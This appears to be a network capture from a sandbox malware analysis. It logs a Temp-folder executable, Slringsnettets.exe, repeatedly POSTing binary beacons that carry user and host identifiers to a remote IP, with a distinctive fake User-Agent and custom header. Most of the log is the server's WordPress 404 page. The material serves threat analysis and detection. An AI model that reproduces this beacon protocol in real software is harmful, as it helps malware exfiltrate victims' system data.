Jul 4, 2024 08:23:06.268393993 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:06.268414021 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:06.268527031 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:06.268541098 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:06.268552065 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:06.268558025 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:06.268563986 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:06.271233082 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:06.271255970 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:06.423937082 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:06.430396080 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:09.439086914 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:06 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:09.439102888 CEST	224	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.wi
Jul 4, 2024 08:23:09.439201117 CEST	1236	IN	Data Raw: 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e Data Ascii: dth,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canv
Jul 4, 2024 08:23:09.439213991 CEST	1236	IN	Data Raw: 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 Data Ascii: tingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.ge
Jul 4, 2024 08:23:09.439233065 CEST	1236	IN	Data Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 Data Ascii: ion(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</scrip
Jul 4, 2024 08:23:09.439390898 CEST	672	IN	Data Raw: 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 Data Ascii: ffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-them
Jul 4, 2024 08:23:09.439537048 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:09.439548016 CEST	224	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
Jul 4, 2024 08:23:09.439564943 CEST	1236	IN	Data Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
Jul 4, 2024 08:23:09.439574003 CEST	224	IN	Data Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:09.594873905 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:09.600044012 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:13.522263050 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:10 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:13.522294044 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:13.522303104 CEST	448	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:13.522324085 CEST	1236	IN	Data Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
Jul 4, 2024 08:23:13.522335052 CEST	1236	IN	Data Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
Jul 4, 2024 08:23:13.522341967 CEST	448	IN	Data Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
Jul 4, 2024 08:23:13.522500992 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:13.522514105 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:13.522520065 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:13.522669077 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:13.686996937 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:13.692156076 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:16.522528887 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:14 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 